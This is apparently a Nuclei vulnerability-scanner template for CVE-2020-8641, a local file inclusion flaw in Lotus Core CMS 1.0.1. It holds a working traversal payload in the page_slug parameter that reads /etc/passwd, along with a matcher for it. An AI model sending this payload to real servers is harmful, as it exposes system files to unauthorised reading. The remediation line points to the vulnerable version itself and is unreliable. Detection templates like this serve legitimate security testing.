id: CVE-2020-8641 info: name: Lotus Core CMS 1.0.1 - Local File Inclusion author: 0x_Akoko severity: high description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Apply the latest security patch or update to Lotus Core CMS 1.0.1 to fix the LFI vulnerability. reference: - https://cxsecurity.com/issue/WLB-2020010234 - https://www.exploit-db.com/exploits/47985 - https://nvd.nist.gov/vuln/detail/CVE-2020-8641 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-8641 cwe-id: CWE-22 epss-score: 0.0071 epss-percentile: 0.8041 cpe: cpe:2.3:a:lotus_core_cms_project:lotus_core_cms:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lotus_core_cms_project product: lotus_core_cms tags: cve,cve2020,lfi,lotus,cms,edb,lotus_core_cms_project http: - method: GET path: - '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00' matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502210090e3d7f58b6d051bba34a7f85dd0a9d86c32a96e9deef39025d3169838daf78c02201e61d3f1f2704140a962c8563bc75ccb38d7009c0dec06fb5fadb07aaf0cd6ce:922c64590222798bb761d5b6d8e72950